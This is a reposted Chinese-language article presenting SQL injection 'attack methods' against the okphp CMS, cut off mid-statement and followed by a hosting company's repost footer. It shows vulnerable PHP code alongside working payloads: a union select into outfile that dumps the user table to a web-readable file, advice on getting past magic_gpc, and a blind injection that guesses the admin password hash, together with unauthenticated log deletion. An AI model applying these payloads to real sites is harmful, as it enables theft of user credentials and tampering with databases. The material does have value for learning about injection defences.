攻击方法:谈php+mysql注射语句构造
象和php+mysql注射无关,随便提一下)(PHP100中文网)
okphp的后台好象写得很马虎,所有文件都没有判断管理员是否已经登陆,以至于任意访问。我们看list.php的代码: $arr = array("del_log","log_id","del_id"); get_r($arr); // if ($del_log) { 省略........ if ($log_id) { foreach ($log_id as $val) { $q = "delete from $log_table where id=''$val''"; $res = sql_query($q,$conn); if ($res) { $i++; } } } elseif ($del_id) { $q = "delete from $log_table where id=''$del_id''"; $res = sql_query($q,$conn); } $tpl->setVariable("message","$i log deleted ok!"); $tpl->setVariable("action","index.php?action=list_log"); } 代码就只简单的用get_r($arr);判断的提交的参数,我们只要提交相应的$del_log,$log_id,$del_id。就回删除成功。 4.多个文件对变量没有过滤导致sql注射漏洞。 okphp的作者好象都不喜欢过滤:)。基本上所有的sql语句中的变量都是“赤裸裸”的。具体那些文件我就不列出来了,请自己看代码,我这里就用\forums\list_threads.php为例子简单谈一下。 看list_threads.php的代码: $q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=''$forum_id''"; $res = sql_query($q,$conn); $row = sql_fetch_row($res); 变量$forum_id没有过滤,因为mysql不支持子查询,我们可以利用union构造语句进行联合查询(要求MySQL版本在4.00以上)实现跨库操作,我们构造如下: 构造1:利用 SELECT * FROM table INTO OUTFILE ''/path/file.txt''(要求mysql有file权限,注意在win系统中要绝对路径,如:c://path//file.txt )。把所查询的内容输入到file.txt,然后我们可以通http://ip/path/file.txt来访问得到查询的结果。上面的我们可以这样构造$forum_id: $forum_id='' union select * from user_table into outfile ''/path/file.txt'' 以下: $q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=''$forum_id'' union select * from user_table into outfile ''/path/file.txt''"; (PHP100.com) 上面的办法要求比较苛刻,必须得到web的路径(一般可以通过提交错误的变量使mysql报错而得到),而且php的magic_gpc=on选项使注入中不能出现单引号。如果magic_gpc=on我们也可以绕过: 构造2:就象asp跨库查询一样,直接利用union select构造语句,使返回结果不同来猜解,这种方法可以绕过单引号(magic_gpc=on)继续注射,不过在php里这种注射相对困难,根据具体的代码而定。具体的语句构造请参考pinkeyes 的文章《php注入实例》。下面我就结合okphp给个利用“返回结果不同”注射的例子:(见漏洞5)。 5.admin/login.php和users/login.php通过sql语句构造可以猜解得到指定用户密码hash:(其实这个和漏洞1和2是同一个,这里单独拿出来,主要是说明语句构造的方法。) 问题代码同漏洞1。 语句的构造(ps:因为语句本身就是对用户库操作就没必要用union了): $username=admin'' AND LENGTH(password)=6# sql语句变成: $q = "select id,group_id from $user_table where userna |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |